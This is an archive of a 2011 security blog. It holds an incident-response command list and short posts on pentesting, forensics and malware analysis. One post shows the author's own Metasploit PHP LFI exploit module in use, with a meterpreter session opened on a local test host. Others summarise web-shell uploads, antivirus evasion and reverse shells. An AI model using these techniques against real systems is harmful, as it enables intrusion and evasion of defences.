I think the list of executed commands is more or less complete, but I would also add the following :

# currently logged users and server uptime.
w

# all opened connections (TCP,UDP and Unix sockets) and the respective PID/UID
netstat -pan

# same as before but only TCP and UDP
lsof -nn | egrep "TCP|UDP"

# the mount command only displays the currently mounted devices. We may find a commented line or a device that is not automatically mounted
 /etc/fstab

#  Is the server exporing NFS volumes?
cat /etc/exports

# tree view of all the processes
ps faxu

# last users that logged to the system. The -a flag puts the complete remote hostname on the last column
last -a

# similar to the previous one
lastlog

#  quick view of the log policy in the computer. The default is 4 weeks worth of logs.
ls -lat /var/log

# Are they sending logs to a centralized system?
cat /etc/syslog.conf

Wednesday, June 1, 2011

Htaccess Web Shell

Via Mubix I have found this post that describes a new way to upload a web shell to a server.

This method uploads .htaccess files to change how the server behaves. The nice trick here is that the file itself:

  • Allows the .htaccess files to be displayed
  • Tells Apache that the contents of the .htaccess files must be interpreted by PHP (the file itself will be  executed by the PHP interpreter)
  • The last part of the file contains PHP code that will pass commands to the operative system.

As a side note, the author also comments that this trick can also be applied to jsp and mod_perl installations.

Some information on securing file uploads, from OWASP.

Tuesday, May 31, 2011

Remote DLL injection and Antivirus Evasion

Great post written by Mubix, that explains a really interesting technique to bypass an Antivirus running in a Windows host.

Mubix points out to a DLL written by Didier Stevens that will suspend a process and its threads after a delay.  The idea behind is sending the Antivirus process to sleep in order to avoid detection during the pentest.

I understand that the DLL must be uploaded to the host before it is loaded onto the memory process and,  perhaps, this can be used by the Antivirus to flag the DLL before we have a chance to load it. I wonder if this also can be done by Meterpreter without writing to disk.

Monday, May 30, 2011

Pivoting and Post-Explotation (Spanish)

This video (Spanish) corresponds to a talk offered during the last RootedCon in Madrid and published by the pentester.es blog. It  shows different techniques to perform pivoting through systems in a pentest.


José Selvi - Unprivileged Network Post-Exploitation (Rooted CON 2011) from rootedcon on Vimeo.


I found particularly interesting the mention of the  command line kung fu blog.

Props to Paul Asadoorian,  Ed Skoudis, Hal Pomeranz and Tim Medin :)


At the end of the video, there is a nice demo that uses some shell fu to discover servers in the internal network and setup the forwards in Metasploit. Sweet!

Windows EMET: Enforcing Code Execution Protections

This is a good post from darkoperator that explains how to use EMET to enforce code execution protections in windows binaries, like ASLR and DEP.

As explained in the post, the applications have to be compiled with the right flags in order to use these protections by default, but they can also be manually enabled with EMET.

Friday, May 27, 2011

Linux Reverse Shells Using Built-in Tools

This  post by lanmaster53.com explains how to setup reverse shells on Linux  systems (and many Unix flavors).

The different solutions range from Netcat (with and without  GAPING_SECURITY_HOLE disabled) to crazy combinations of named pipes and telnet connections.

Tuesday, May 24, 2011

Metasploit PHP LFI exploit module

Last week I wrote a simple exploit module for Metasploit to attack PHP applications with LFI vulnerabilities.

It uses php://input to inject the code or the webserver logs in other case.

If I had time, I would like to implement some tricks,  like injection PHP code in the SSH logs or the e-mail server logs, but it is not possible by now :)

Note: It is really buggy and the injection may not be successful, depending on the length of the payload. Please remember that PHP limits the size of the POST message and a long payload may be cut. The same problem applies to the log file injection.


msf exploit(handler) > use exploit/unix/webapp/php_lfi
msf exploit(php_lfi) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(php_lfi) > set RPORT 8181
RPORT => 8181
msf exploit(php_lfi) > set URI /index.php?foo=xxLFIxx
URI => /index.php?foo=xxLFIxx


msf exploit(php_lfi) > set PAYLOAD php/meterpreter/bind_tcp
PAYLOAD => php/meterpreter/bind_tcp
msf exploit(php_lfi) > exploit -z


[*] Started bind handler
[*] Trying generic exploits
[*] Clean LFI injection
[*] Sending stage (31612 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:19412 -> 127.0.0.1:4444) at Tue May 24 14:47:29 +0200 2011

C[-] Exploit exception: Interrupt
[*] Session 1 created in the background.
msf exploit(php_lfi) > sessions -i 1
[*] Starting interaction with 1...



meterpreter > ls


Listing: /usr/home/test/cherokee/www
=====================================


Mode              Size  Type  Last modified                   Name
----              ----  ----  -------------                   ----
100644/rw-r--r--  0     fil   Tue May 10 11:09:39 +0200 2011  foo.php
40755/rwxr-xr-x   512   dir   Tue May 10 10:53:59 +0200 2011  images
100644/rw-r--r--  1795  fil   Tue May 10 10:19:23 +0200 2011  index.html
100644/rw-r--r--  37    fil   Tue May 10 13:52:25 +0200 2011  index.php



meterpreter > sysinfo  
OS          : FreeBSD redphantom.skynet.ct 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17 02:41:51 UTC 2011     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
Computer    : redphantom.skynet.ct
Meterpreter : php/php  
meterpreter > exit




php_lfi.rb

Python Port of RegRipper Added to Volatility

Thanks to this post I have learned that a Python port of RegRipper has been written and integrated as a Volatility plugin.

This means that Volatility is the first tool that permits cached registry analysis.

How to Extract Flash Objects from Malicious PDF Files

Nice post from the SANS Computer Forensics Blog that explains how to extract Flash Objects from malicious PDF  files.

Why using Flash objects on PDF files? The attackers seem to use ActionScript as an alternative to JavaScript to perform the Heap Spray.

This cheatsheet is being used in conjunction with  pdf-parser or PDF Stream Dumper to extract the objects contained in the PDF.

Once the Flash object has been extracted, SWFTools is used to dissemble it and proceed with the analysis.

At the end, the author of the post links to a real life example.

Tuesday, May 17, 2011

Collection of SMBRelay attacks

This is a series of blog posts from the Digital Security Research Group that collects all the possible ways to gain access by executing SMBRelay attacks or by stealing token credentials.

So far, they have discussed the following scenarios:

- Attacking ERP systems.

- Attacking MSSQL servers.

- SMBRelay and Oracle.

- Security software that scans the clients via SMB

- Attacking corporate users

Fooling Bots and Web Scanners with WebLabyrinth

Nice tech-segment from Pauldotcom that explains how to install  WebLabyrinth, that is a set of PHP scripts that detects and fools bots and web scanners by trapping them in a "Labyrinth" of links.




Monday, May 9, 2011

Analyzing a Compromised Linux Server With Volatility

The Challenge 7 of the Forensic Challenge 2011 from the Honeynet  Project is a good opportunity to use Volatility to analyse a compromised Linux server.

The image and memory dump seem to show a possible compromise via an unpatched vulnerability in Exim (CVE-2010-4345) .

Thursday, May 5, 2011

Why is Metasploit flagged by the AVs?

Nice article from Scriptjunkie that explains why the Metasploit binaries are being flagged by the AVs.

As I understand,  a Metasploit binary is an executable that creates a RWX memory area, loads the encoded shellcode onto it and then it transfers the execution. Therefore, the AVs are not analyzing the encoded shellcode for the detection, but the executable being used to load the shellcode.

A possible solution would be patching another binary of your choosing, but the AVs may flag it as well because it is creating a RWX memory area and then pointing the IP there, which is really suspicious.

Why I do not trust the cloud

This post in the Amazon forums is so impressive in many senses. It comes to explain how cloud computing and a bad engineer can put  human lives and the business into risk.

Somebody was clever enough to put a critical service like a cardiac patients monitoring system on the cloud, without any kind of backup. Yes, it sounds so bad for many reasons...

It turns out that Amazon EC2 went down for some days and the company had all the critical services installed there, without any kind of backup system in another datacenter or whatsoever.  I understand they decided to go to the cloud because it was way cheaper compared with maintaining their own infrastructure, but without playing attention to the possible problems, requirements and regulations they have to comply with.

This is a good example to present to the decision makers when they discuss about moving parts of the infrastructure to cloud services or setting up its own infrastructure. It may be good for the business in a short term, but be prepared for the problems.

Wednesday, April 27, 2011

EAP-MD5 Offline password attacks

This post from Pauldotcom explains how to perform dictionary offline attacks against EAP-MD5 (802.1X protected networks)  authentication packets.


Once we have a packet capture with the authentication packets, the post offers two possibilities:
- Patched version of xtest to read the passwords through a pipe (John the Ripper produces the password list)
- A small Scapy script  called  eapmd5crack.py 

Converting Unicode to Shellcode

Some nice shell-fu to decode  Unicode encoded  shellcode.  It is common to find  these kind of payloads in Microsoft Office and PDF files that contain exploits and these techniques always come in  handy.

Wednesday, April 20, 2011

Attacking Oracle Web Applications With Metasploit

Excellent presentation by Chris Gates (carnal0wnage) on Attacking Oracle Web Applications With Metasploit [PDF]

TCP Split Handshake

I have found the following whitepaper  that explains the TCP Split Handshake [PDF] and its implications.

Layer 2 attacks on IPv6

Via the Internet Storm Center.

NDP Spoofing is the equivalent to ARP spoofing in IPv4 and can be used to play MITM.


RA Spoofing  (DHCP attacks) can be used to impersonate routers and assign IP addresses to the victim.

RawCap Windows Sniffer

RawCap is a sniffer for Windows systems that does not need any external library or DLL to run, being really useful for penetration tasting.



         Here are some highlights of why RawCap is a great tool to have in your toolset:
  • Can sniff any interface that has got an IP address, including 127.0.0.1 (localhost/loopback) 
  • RawCap.exe is just 17 kB
  • No external libraries or DLL's needed
  • No installation required, just download RawCap.exe and sniff
  • Can sniff most interface types, including WiFi and PPP interfaces
  • Minimal memory and CPU load
  • Reliable and simple to use

Wednesday, April 13, 2011

Malware analysis with ClamAV and YARA

Via Infosec Resources

YARA is an extremely flexible identification and classification engine written by Victor Manuel Alvarez of Hipasec Sistemas. It runs on Windows, Linux and Mac OS X, and can be used through its command-line interface or from your own Python scripts with the yara-python extension.
YARA rules are easy to write and understand. They have a syntax that resembles a C struct declaration. However creating thousands of rules takes a lot of time and effort. That’s why it makes more sense to use ClamAV signatures. Usually ClamAV signatures can be found under /usr/local/share/clamav or /usr/lib/clamav on Linux systems. This is where you will find the main.cld and daily.cld. Alternately, they may have .cvd extensions, main.cld file contains the primary base of signatures and daily.cld contains incremental daily updates


These tools are well explained in the Malware Analyst's Cookbook and DVD book.

IPv6 Pen-testing

Via www.room362.com



Rick Hayes - Assessing and Pen-Testing IPv6 Networks from Adrian Crenshaw on Vimeo.

Monday, April 11, 2011

Anatomy of the RSA compromise

This blog post from the RSA explains how the attackers gained access to their data.

In a nutshell, the attackers used social engineering to let an employee open an Excel Spreadsheet that contained a Flash object  ( zero-day CVE-2011-0609). Once they back-doored the computer, they used the credentials to gain further access on the network (privileged accounts and systems) and they stole the data.

Analyzing a Stuxnet infection with the Sysinternals Tools

A really good blog post  on technet that  explains how a machine is infected with Stuxnet and how the infection process can be analyzed with the Sysinternals Tools

An overview of Rustock

It is known that Rustock has been taken down, but it is always a good idea to understand how a computer is infected with malware, specially if you have to respond to this kind of incidents and/or design the defenses.

This nice post from fireeye blog gives a good overview of how computer can be infected with Rustock.

Thursday, March 31, 2011

Timeline analysis on Pauldotcom

Awesome tech segment on  MFT Timeline analysis from the Pauldotcom guys.

The Tech Segment explains how to perform a Timeline analysis  with open-source tools and how to spot anti-forensics techniques like timestamp manipulations.

More information on timestamp manipulation can be found in the Sans Computer Forensics Blog that I already commented in this post.

The original blog post on the Sans Computer Forensics Blog talks about a tool called  mft_parser_cl created by  Mark McKinnon  that has been released for this tech segment. It is really helpful to spot timestamp manipulations, because it is able to pull $FILE_NAME time stamps and put them into bodyfile format so they can be added to the overall time line for analysis.





iPhone forensics with Paraben

Via Infoset Institute.

In this video, we will review the wealth of forensic data stored on an iPhone 3Gs using Paraben’s Device Seizure software.

The following information can be extracted out of the iPhone:
  •  Web browser history
  • A history of all locations looked up on map applications
  • The phone’s serial number and the owner’s public key
  • The call and text history, including call durations
  • Dynamic text which is a wealth of useful forensic information



iPhone Forensics & Data Recovery from darren dalasta on Vimeo.

Tuesday, March 29, 2011

Microsoft has taken down the Rustock botnet

Probably many people is already aware, because this information has created many headlines and hit the media.

Yes, Microsoft has reportedly taken down the Rustock botnet, like they did before with Waledac.

I tend to think It was a coordinated effort with many researchers and institutions involved, but we cannot deny that Microsoft has the needed resources to make it possible :)

This is a small compilation of articles/post I have found on Internet:

General explanation,
http://www.h-online.com/security/news/item/Rustock-botnet-out-of-action-1210450.html

Legal order,
http://www.noticeofpleadings.com/

Complaint,
http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-82-95-DCU/2112.2011_2D00_02_2D00_09_2D00_Complaint.pdf


Really nice explanation by Brian Krebs, as always :)
http://krebsonsecurity.com/2011/03/homegrown-rustock-botnet-fed-by-u-s-firms/


Arstechnica
http://arstechnica.com/microsoft/news/2011/03/how-operation-b107-decapitated-the-rustock-botnet.ars

Monday, March 28, 2011

SpyEye Botmasters Try To Sabotage abuse.ch

I have learnt via this post that cybercriminals are trying to sabotage abuse.ch's trackers.

They have added a ddos plug-in to the trojans that will attack  their infrastructure  and also they are trying to introduce legit domains in the tracker by adding them to to the list of drop points.

Extracting Real VNC passwords from the Windows Registry

This post from carnal0wnage explains how to extract the Real VNC passwords from the Windows Registry.

The password is DES encrypted, but  Real VNC is using a hardcoded key. No comments on that ... :)

Thursday, March 24, 2011

CAs being owned and the SSL trust model

I really recommend reading this post from Jacob Appelbaum, if you want to understand the story of the compromised CA.

In a short resume, seems like a CA named COMODO High Assurance Secure Server CA was compromised and the attacker issued valid certificates  with their keys.

I quote Comodo's statement:

One user account in one RA was compromised.The attacker created himself a new userID (with a new username and password) on the compromised user account.

Iit seems that some of the issued certificates where: login.live.com, mail.google.com, www.google.com, login.yahoo.com (3 certificates), login.skype.com and addons.mozilla.org.

So far, with the above commented information, we can discuss how broken is the SSL trust model, since  just one compromised CA can cause a big damage and make possible a MITM attack against a big website like mail.google.com.

But that is not all. It seems that the main browser developers were "silently" issuing patches to blacklist the created certificates until Appelbaum  analyzed the serial numbers, as explained in the post.

Also, the Certificate Revocation Lists (CRL) does not seem to work because the browsers "fail open" by default . It means that the browser will not complain if it cannot check the CRL (the CAs do not seem to help a lot to get things better) and the certificate will be blindly accepted, as explained here.

Finally, Comodo  seems to blame the Iranian government  because the attack came from an Iranian IP address,  but in my opinion it does not mean that the Iranian government is behind.

Wednesday, March 23, 2011

Windows Integrity Levels explained

This post from the Internet Storm Center explains the  concept of the Integrity Levels, that is a tool available  on Windows Vista, 7 and 2008.

Integrity levels can restrict one process from interacting with another process even if both processes are running under the same user account and even if the user has administrative privileges. 

Basically,  a process running under a lower integrity level will be limited in the way it can interact with process that run in a higher integrity level, regardless the access rights. This can be really helpful to mitigate a possible exploitation.

This is why it's advantageous to run the processes that are likely to be targeted by exploits under the Low integrity level. For instance, if a browser running under the Low integrity level gets exploited, the attacker's payload will have a hard time injecting itself into the majority of other processes or modifying critical files.

It seems it is a key tool used to create sandboxes in  Internet Explorer,  Chrome and the new Adobe Acrobat.

The article links to the following blog post written by Didier Stevens and called Integrity Levels and DLL Injection. It describes how this feature blocks a DLL injection attempt from a Low Integrity process to another with Medium Integrity.

Network Sniffers Class

Via IronGeek, an awesome list of tools and videos that will help you do sniffing and MITM attacks.

I link to the videos in Vimeo, but his site is really worthy :)



Sniffers Class Part 1 from Adrian Crenshaw on Vimeo.



Sniffers Class Part 2 from Adrian Crenshaw on Vimeo.



Sniffers Class Part 3 from Adrian Crenshaw on Vimeo.

Snort and Sguil easy installation with a Slackware Linux ISO

Via the Internet Storm Center, there is a  Slackware Linux ISO installation with Sguil ready to use.

More info here [pdf]

DNS Prefetching implications

DNS Prefetching can be a nice feature to speed up browsing, but it can cost a big headache and a big bill as well, if you keep a website with many visits.

Via this post you can learn what happen when your website has many subdomains and these are prefetched for each visit. This is really important if your paying for your DNS services and the number of queries sent matters. Firefox seems to be even worse, because it tries to resolve IPV6 addresses (AAAA query) for each subdomain as well.

It seems that the browsers understand a standard tag that permits to disable the prefetching.

More info on Controlling DNS Prefetching

Thursday, March 17, 2011

bad password implementations and brute-force attacks

These serie of posts [ 1 , 2 ]  from SkullSecurity is really enlightening.

I understand that the main error here is using a small seed.  I am not an expert , but I understand that the number of possible passwords (the universe) directly depends on the used seed. Therefore, if we use 1,000,000 as a seed, we will have only have one million passwords, that can be easily pre-calculated (a pair of password, md5-hash) and used in an offline attack with John the Ripper.


The attack in the second post is fairly similar, but it ends up with a really small universe of only 15,993 possible passwords, due a really bad implementation, that even permits an easy and successful online attack.

The attack consists of grabbing  the HTML output corresponding of a failed login and then comparing the HTML output of each brute force attempt against it. It the md5sum does not match, the password is valid.

Analyzing malware packaged in malicious PDF files

Great post from research.zscaler.com

It explains how to analyze a  PDF that contains malicious code.  The following steps are followed during the analysis.


- Analyze/Extract the different objects from the PDF file.  The file contains javascript code in this case.
- Use Malzilla to evaluate the javascript code and extract the shellcode that is Unicode encoded.
- Decode the shellcode to obtain a valid executable binary.
- Use a debugger ( OllyDbg) to analyze the binary. The analyst extracts the XOred code from the binary.
- Use a debugger again to analyze the extracted code. It contacts a website to download the second stage and infect the host computer.

Wednesday, March 9, 2011

DLP is the next Silver Bullet

I think I really do not need to explain what DLP is, unless you have been disconnected for many years.

I was astonished when I first read this post from the Internet Storm Center. The post describes a setup of Snort running in  a bridge and inspecting the traffic between the Corporate Network and the border router (fair enough).


Then, the following rule is used as an example to catch a possible data ex-filtration.

alert ip 192.168.1.0/24 any -> any any (msg:”Data Loss from inside the network”; content:"Company X - Confidential"; rev:1)

I am not an expert in security and you do not have to trust my words, but I think that deploying a device in front of the border router and with this kind of signatures, is only going to catch the more Naive users.

A skilled attacker will encode/encrypt/partition the data and 'act' like a normal user in order to bypass this kind of rules. Therefore,  we are just having a false sense of security.

I think, the only way to detect a skilled attacker is by knowing your network and applying the ideas explained in  this book  from Richard BejtlichExtrusion Detection: Security Monitoring for Internal Intrusions

Monday, March 7, 2011

Linux Support to Volatility

Looks like people is working to support Linux memory images in Volatility. You can find more information in the  volatility blog and the attrc's blog (developer).

attrc's blog post is specially interesting because explains the currently implemented functionalities.

There is also this nice blog post that explains how to use the new Linux support on Volatility  to resolve the last Honeynet challenge.